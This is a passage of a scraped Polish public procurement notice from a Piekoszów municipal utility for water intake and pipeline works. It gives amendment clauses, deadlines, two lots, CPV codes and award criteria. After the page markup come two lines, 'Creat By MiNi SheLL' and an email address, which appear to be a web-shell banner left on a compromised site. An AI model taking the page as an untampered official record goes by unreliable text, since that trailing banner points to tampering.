nastąpić w niżej wskazanych przypadkach i zakresie:a)	wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć i jemu zapobiec, uniemożliwiającego lub poważnie utrudniającego wykonanie niniejszej umowy w ustalonym terminie (siła wyższa) – zmiana terminu wykonania umowy może nastąpić o łączny czas występowania tego zdarzenia losowego (czas jest liczony w dniach);b)	wystąpienia opóźnienia lub zaniechania w dokonaniu czynności (w tym wydaniu orzeczeń) przez właściwe organy państwowe lub podmioty trzecie, których dokonanie jest niezbędne dla prawidłowości wykonania niniejszej umowy, a które nie są następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność – zmiana terminu wykonania umowy może nastąpić o łączny czas występowania tego opóźnienia lub zaniechania (czas jest liczony w dniach);c)	przerwy realizacji umowy na skutek działań właściwych organów państwowych (np. wstrzymanie wykonywania usług lub robót budowlanych przez organy państwowe, itd.), z przyczyn, za które wykonawca nie ponosi odpowiedzialności – zmiana terminu wykonania umowy może nastąpić o łączny czas tych działań (czas jest liczony w dniach);d)	konieczności wykonania dodatkowych lub zamiennych usług lub robót budowlanych w trakcie wykonywania niniejszej umowy lub zmniejszenia zakresu usług lub robót budowlanych objętych przedmiotem umowy – zmiana terminu wykonania umowy może nastąpić o czas niezbędny do wykonania dodatkowych usług lub robót budowlanych bądź o czas zaoszczędzony z uwagi na zmniejszenie zakresu usług lub robót budowlanych (czas jest liczony w dniach).4)	Zasady, o których mowa w Sekcji XIX pkt 7 SIWZ, stosuje się odpowiednio do zmian terminów ustalonych w szczegółowym harmonogramie usług i robót budowlanych, sporządzonym przez wykonawcę po zawarciu umowy.5)	Zmiana materiałów, parametrów technicznych, technologii, rodzaju, zakresu i sposobu wykonania usług i robót budowlanych objętych przedmiotem umowy, o ile zmiany te nie przekroczą 65% wartości przedmiotu umowy, może nastąpić w niżej wskazanych przypadkach:a)	konieczności wykonania dodatkowych lub zamiennych usług lub robót budowlanych, które będą niezbędne dla prawidłowego wykonania przedmiotu umowy, a których nie można było przewidzieć na etapie składania ofert w toku postępowania o udzielenie zamówienia publicznego;b)	konieczności zmiany technologii, sposobu wykonania przedmiotu umowy lub konieczności wykonania dodatkowych lub zamiennych usług lub robót budowlanych - które to będzie niezbędne dla prawidłowego wykonania przedmiotu umowy, a które ujawniły się w toku wykonywania umowy w związku z przeprowadzeniem przez wykonawcę badań i opracowań hydrologicznych, z których wynika konieczność – z przyczyn obiektywnych – zmiany pierwotnie zakładanej lokalizacji ujęcia wody i/lub sieci wodociągowej;c)	konieczności zmiany lokalizacji ujęcia wody lub sieci wodociągowej, która będzie niezbędna dla prawidłowego wykonania przedmiotu umowy, a która ujawniła się w toku wykonywania umowy w związku z przeprowadzeniem przez wykonawcę badań i opracowań hydrologicznych, z których wynika konieczność – z przyczyn obiektywnych – zmiany pierwotnie zakładanej lokalizacji ujęcia wody i/lub sieci wodociągowej. W tym przypadku dopuszcza się również wykonanie dodatkowych lub zamiennych usług lub robót budowlanych, zmianę działek, na których zostanie zrealizowanie zamówienie oraz zmianę długości sieci wodociągowej – w zakresie niezbędnym do prawidłowego wykonania przedmiotu umowy;d)	konieczność zmiany liczby przyłączy, która będzie niezbędna dla prawidłowego wykonania przedmiotu umowy, a która ujawniła się w toku wykonywania umowy w związku z przeprowadzeniem przez wykonawcę szczegółowych wyliczeń, z których wynika konieczność – z przyczyn obiektywnych – zmiany liczby przyłączy. W tym przypadku dopuszcza się również wykonanie dodatkowych lub zamiennych usług lub robót budowlanych – w zakresie niezbędnym do prawidłowego wykonania przedmiotu umowy;e)	konieczności zmiany lokalizacji ujęcia wody lub sieci wodociągowej, która będzie niezbędna dla prawidłowego wykonania przedmiotu umowy, a która ujawniła się w toku wykonywania umowy w związku z przeprowadzeniem przez wykonawcę badań i opracowań hydrologicznych, z których wynika konieczność – z przyczyn obiektywnych – zmiany pierwotnie zakładanej lokalizacji ujęcia wody i/lub sieci wodociągowej. W tym przypadku dopuszcza się również wykonanie koniecznych zmianę długości sieci wodociągowej w zakresie niezbędnym do prawidłowego wykonania przedmiotu umowy;f)	konieczności wykonania dodatkowych lub zamiennych usług lub robót budowlanych bądź odstąpienia przez Zamawiającego od wykonania części usług lub robót budowlanych, z uwagi na zmianę po zawarciu umowy powszechnie obowiązujących przepisów prawa, jeżeli zmiany te będą miały istotny wpływ na wykonanie przedmiotu umowy;g)	odstąpienia przez Zamawiającego od wykonania części usług lub robót budowlanych zbędnych do wykonania przedmiotu umowy zgodnie ze sztuką budowlaną i wiedzą techniczną, a wynikających z technologii, sposobu wykonania usług lub robót budowlanych objętych przedmiotem umowy, faktycznych obmiarów lub z przeprowadzonych przez wykonawcę badań i opracowań hydrologicznych; usługi lub roboty budowlane pierwotnie planowane zostaną wyłączone z zakresu przedmiotu umowy;h)	konieczności wykonania dodatkowych lub zamiennych usług lub robót budowlanych bądź odstąpienia przez Zamawiającego od wykonania części usług lub robót budowlanych, z uwagi na wystąpienia nieprzewidzianych w dokumentacji przetargowej warunków geologicznych, archeologicznych, w szczególności: występowanie skały, gruntów nawodnionych, niewypałów i niewybuchów, wykopalisk archeologicznych, odmiennych od przyjętych w dokumentacji warunków terenowych, w szczególności istnienie niezinwentaryzowanych lub błędnie zinwentaryzowanych obiektów budowlanych, sieci (uzbrojeń);i)	konieczności zmniejszenia lub zwiększenia ilości i zakresu usług lub robót budowlanych objętych dokumentacją przetargową, pominięcia niektórych usług lub robót budowlanych, jeśli jest to niezbędne do prawidłowego wykonania przedmiotu umowy, w szczególności konieczności realizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technologicznych niż wskazane w dokumentacji przetargowej;j)	zmian technologicznych spowodowanych następującymi okolicznościami: (-) niedostępnością na rynku materiałów lub urządzeń, wskazanych w dokumentacji przetargowej, spowodowanej zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów lub urządzeń, (-) możliwością zastosowania materiałów lub urządzeń o równym lub lepszym standardzie niż przyjęte w dokumentacji przetargowej, pozwalających na zaoszczędzenie kosztów wykonania przedmiotu umowy lub kosztów eksploatacji wykonanego przedmiotu umowy lub umożliwiające uzyskanie lepszej jakości usług lub robót budowlanych, (-) możliwością zastosowania technologii wykonania przedmiotu umowy, pozwalającej na zaoszczędzenie czasu wykonania przedmiotu umowy lub kosztów eksploatacji wykonanego przedmiotu umowy, (-) koniecznością wykonania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych lub technologicznych, niż wskazanie w dokumentacji przetargowej, w sytuacji gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy, (-) koniecznością wykonania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa, (-) koniecznością usunięcia sprzeczności w dokumentacji projektowej;k)	istnienia potrzeby wykonania dodatkowych lub zamiennych usług lub robót budowlanych, skutkujących zwiększeniem: bezpieczeństwa realizacji robót, bezpieczeństwa użytkowania, funkcjonalności obiektu budowlanego lub zmniejszeniem kosztów realizacji umowy, usprawnieniem procesu budowlanego, jeżeli nie spowoduje to odstąpienia w sposób istotny od zatwierdzonego projektu budowlanego; l)	konieczności zmiany sposobu wykonania lub zakresu usług lub robót budowlanych, jeśli jest to niezbędne do uwzględnienia wydanych w toku wykonywania umowy dodatkowych zaleceń właściwych organów państwowych;m)	z przyczyn wyżej nie wymienionych, o ile zmiany będą korzystne dla Zamawiającego i okażą się potrzebne do prawidłowego wykonania przedmiotu umowy i celu zamówienia.6)	Zmiana wysokości wynagrodzenia należnego wykonawcy może nastąpić w przypadkach dokonywania zmian, o których mowa w Sekcji XIX pkt 9 SIWZ, jeśli zmiany te będą miały wpływ na koszty wykonania przedmiotu umowy przez wykonawcę. Wysokość wynagrodzenia należnego wykonawcy zostanie zaproponowana przez wykonawcę i wymaga akceptacji Zamawiającego. Wykonawca będzie postępował według następujących zasad:a)	ceny materiałów i sprzętu nie będą wyższe niż średnie ceny publikowane przez aktualny kwartalnik SEKOCENBUD lub ORGBUD na czas ich wbudowania i wykorzystania, a dla materiałów specjalistycznych ((niesklasyfikowanych w katalogach) – według faktur zakupu;b)	nakłady robocizny zostaną ustalone według odpowiednich katalogów (np. KNNR-ów), a dla usług lub robót specjalistycznych (niesklasyfikowanych w katalogach) – według kalkulacji własnej;c)	wynagrodzenie zostanie ustalone na podstawie kosztorysu ofertowego Wykonawcy, sporządzonego według zasad opasanych w niniejszym ustępie i zasad określonych w rozporządzeniu Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. 2004 r., nr 130, poz. 1389), po wcześniejszym uzgodnieniu przez wykonawcę i Zamawiającego wynagrodzenia za elementy jednostkowe;d)	w przypadku zmniejszenia/ograniczenia zakresu przedmiotu umowy, wynagrodzenie zostanie pomniejszone o wartość tego zimniejszego/ograniczonego zakresu rzeczowego; wartość ta zostanie ustalona na podstawie kosztorysu ofertowego Wykonawcy sporządzonego według zasad opasanych w niniejszym ustępie i zasad określonych w rozporządzeniu Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. 2004 r., nr 130, poz. 1389), po wcześniejszym uzgodnieniu przez Strony wynagrodzenia za elementy jednostkowe; e)	wartość dodatkowych usług lub robót budowlanych nie może przekroczyć 50% wartości przedmiotu umowy.7)	W przypadku, gdy przed zawarciem umowy wykonawca opierał się na zasobach podmiotów trzecich wykazując spełnianie warunków udziału w postępowaniu lub wskazywał podwykonawców, którym zleci częściowe wykonanie przedmiotu umowy, dopuszcza się zmianę tych podmiotów lub podwykonawcy w trakcie wykonywania umowy pod warunkiem, że nowy podmiot/podwykonawca wykaże spełnienie warunków w zakresie nie mniejszym niż wskazany na etapie postępowania o udzielenie zamówienia publicznego.8)	W przypadku zmiany kluczowego personelu wykonawcy, wykonawca powinien przedstawić Zamawiającemu nową osobę o nie gorszych kwalifikacjach i uprawnieniach w stosunku do zmienianej osoby. 9)	W przypadku zmiany nazw, siedziby i form organizacyjno-prawnej Zamawiającego i/lub wykonawcy, a także innych danych identyfikacyjnych Zamawiającego i/lub wykonawcę, strona, której zmiany dotyczą, powinna niezwłocznie przedstawić drugiej stronie nowe dane.10)	Zmiana rachunków bankowych Zamawiającego i/lub wykonawcy może nastąpić w przypadku zmiany banku prowadzącego rachunek.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2020-10-20</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">j. polski.</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków, które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Tak</span> <br/> <b>IV.6.5) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6">Zgodnie z art. 133 ust. 1 ustawy – PZP, do przedmiotowego zamówienia, jako zamówienia sektorowego w rozumieniu przepisów art. 132 ust. 1 pkt 4 ustawy z ustawy - PZP, nie stosuje się przepisów ustawy - PZP. Przepisy ustawy - PZP mają odpowiednie zastosowanie jedynie w przypadkach wymienionych w SIWZ i regulaminie udzielania zamówień publicznych sektorowych przez „Zakład Usług Komunalnych” w Piekoszowie Sp. z o.o. do których nie stosuje się ustawy z dnia 29 stycznia 2004 r. – Prawo zamówień publicznych </span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>„Nowe ujęcie wody w zachodniej części Gminy Piekoszów”</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1)	Część nr 1 zamówienia obejmuje swym zakresem w szczególności:a)	wykonanie prac badawczych i poszukiwawczych, w celu ustalenia najkorzystniejszej lokalizacji na nowy odwiert studni głębinowej, wraz z wykonaniem niezbędnej dokumentacji hydrologicznej (w tym w szczególności opracowanie projektu robót geologicznych z wierceniem studni głębinowej, analiza warunków hydro-geologicznych, badania hydrologiczne, opracowanie projektu hydrogeologicznego studni, głębokości studni, konstrukcji otworu hydrogeologiczno-badawczego, próbne pompowanie, opracowanie powykonawczej dokumentacji hydrologicznej ustalającej zasoby eksploatacyjne ujęcia, analiza ryzyka, opracowanie projektu strefy ochronnej);b)	wykonanie operatu wodnoprawnego na szczególne korzystanie z wód wraz z operatem na wykonanie urządzenia wodnego i uzyskania, w imieniu Zamawiającego, niezbędnych prawomocnych i ostatecznych pozwoleń, w tym pozwolenia wodnoprawnego;c)	wykonanie, spełniającej wszelkie wymagania określone w ustawie z dnia 07 lipca 1994 r. – Prawo budowlane (j.t. Dz. U. z 2020 r., poz. 1333 ze zm.) i rozporządzeniu Ministra Infrastruktury z dnia 02 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego, dokumentacji projektowej ze szczegółowością projektu wykonawczego nowego ujęcia wody wraz z niezbędnymi obiektami budowlanymi i technologicznymi oraz uzyskanie, w imieniu Zamawiającego, potrzebnych ostatecznych i prawomocnych decyzji administracyjnych wraz ze wszystkimi niezbędnymi opracowaniami, materiałami, uzgodnieniami i czynnościami koniecznymi do wykonania tej dokumentacji;d)	wykonanie, spełniającej wszelkie wymagania określone w ustawie z dnia 07 lipca 1994 r. – Prawo budowlane (j.t. Dz. U. z 2020 r., poz. 1333 ze zm.) i rozporządzeniu Ministra Infrastruktury z dnia 02 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego, dokumentacji projektowej ze szczegółowością projektu wykonawczego nowej sieci wodociągowej łączącej nowe ujęcia wody z istniejącymi wodociągami wraz z niezbędnymi obiektami budowlanymi i technologicznymi oraz uzyskanie, w imieniu Zamawiającego, potrzebnych ostatecznych i prawomocnych decyzji administracyjnych wraz ze wszystkimi niezbędnymi opracowaniami, materiałami, uzgodnieniami i czynnościami koniecznymi do wykonania tej dokumentacji;e)	budowę nowego ujęcia wody wraz z niezbędnymi obiektami budowlanymi i technologicznymi, w oparciu o wykonaną przez wykonawcę i zaakceptowaną przez Zamawiającego dokumentację projektową ze szczegółowością projektu wykonawczego, w celu zapewnienia dostarczania wody z nowego ujęcia wody do innych miejscowości z gminy Piekoszów zaopatrywanych w wodę z istniejących ujęć wody (budowa sieci wodociągowej spinającej nowe ujęcie wody z istniejącymi sieciami wodociągowymi ujęć wody w Lesicy, Szczukowicach i Szczukowskich Górkach);f)	budowę nowej sieci wodociągowej z uzbrojeniami i innymi obiektami budowlano-technologicznymi, w oparciu o wykonaną przez wykonawcę i zaakceptowaną przez Zamawiającego dokumentację projektową ze szczegółowością projektu wykonawczego;g)	uzyskanie, w imieniu Zamawiającego, ostatecznego i prawomocnego pozwolenia na użytkowanie lub skutecznego zgłoszenia o zamiarze przystąpienia do użytkowania wraz z niezbędnymi uzgodnieniami organów administracji publicznej, jeśli taki obowiązek wynika z ustawy z dnia 07 lipca 1994 r. – Prawo budowlane (j.t. Dz. U. z 2020 r., poz. 1333 ze zm.)h)	zapewnienie wsparcia technicznego i serwisu gwarancyjnego, w tym usuwania wszystkich wad/usterek, maszyn, urządzeń, oprogramowania i instalacji zamontowanych w węźle technologicznym, na warunkach określonych we wzorze umowy, stanowiącym zał. nr 13a do SIWZ, w okresie wskazanym w ofercie wykonawcy (pozacenowe kryterium oceny ofert), jednak w okresie nie krótszym niż 5 lat od dnia bezusterkowego odbioru robót budowlanych.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>45200000-9, 45200000-8, 45252126-7, 45252000-8, 45252000-8, 73000000-2, 73100000-5, 71000000-8, 71300000-1, 71320000-7, 71320000-7, 71330000-0, 71332000-4<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2022-03-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">okres gwarancji i rękojmi</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b>Od dnia podpisania umowy do dnia 31 marca 2022 r.<br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>„Przyłączenie miejscowości Gałęzice, gm. Piekoszów do ujęcia wody w Lesicy i odłączenie od infrastruktury wod.-kan. należącej do Nordkalk Sp. z o.o. Zakład w Miedziance”</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część nr 2 zamówienia obejmuje swym zakresem w szczególności:a)	wykonanie, spełniającej wszelkie wymagania określone w ustawie z dnia 07 lipca 1994 r. – Prawo budowlane (j.t. Dz. U. z 2020 r., poz. 1333 ze zm.) i rozporządzeniu Ministra Infrastruktury z dnia 02 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego, dokumentacji projektowej ze szczegółowością projektu wykonawczego sieci wodociągowej wraz z uzbrojeniem, niezbędnymi obiektami budowalnymi, technologicznymi, inżynierii wodnej przyłączy, oraz uzyskanie, w imieniu Zamawiającego, potrzebnych ostatecznych i prawomocnych decyzji administracyjnych wraz ze wszystkimi niezbędnymi opracowaniami, materiałami, uzgodnieniami i czynnościami koniecznymi do wykonania tej dokumentacji;b)	budowę sieci wodociągowej oraz odcinków bocznych (przyłączy), z uzbrojeniami i innymi obiektami budowlano-technologicznymi, w oparciu o wykonaną przez wykonawcę i zaakceptowaną przez Zamawiającego dokumentację projektową ze szczegółowością projektu wykonawczego;c)	uzyskanie, w imieniu Zamawiającego, ostatecznego i prawomocnego pozwolenia na użytkowanie lub skutecznego zgłoszenia o zamiarze przystąpienia do użytkowania wraz z niezbędnymi uzgodnieniami organów administracji publicznej, jeśli taki obowiązek wynika z ustawy z dnia 07 lipca 1994 r. – Prawo budowlane (j.t. Dz. U. z 2020 r., poz. 1333 ze zm.);d)	zapewnienie wsparcia technicznego i serwisu gwarancyjnego, w tym usuwania wszystkich wad/usterek, maszyn, urządzeń, oprogramowania i instalacji zamontowanych w węźle technologicznym, na warunkach określonych we wzorze umowy, stanowiącym zał. nr 13b do SIWZ, w okresie wskazanym w ofercie wykonawcy (kryterium oceny ofert), jednak w okresie nie krótszym niż 5 lat od dnia bezusterkowego odbioru robót budowlanych.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>45200000-9, 45200000-8, 45252126-7, 45252000-8, 73000000-2, 73000000-2, 73100000-5, 71000000-8, 71300000-1, 71320000-7, 71330000-0, 71332000-4<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2022-03-31<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">okres gwarancji i rękojmi</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b>Od dnia podpisania umowy do dnia 31 marca 2022 r.<br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com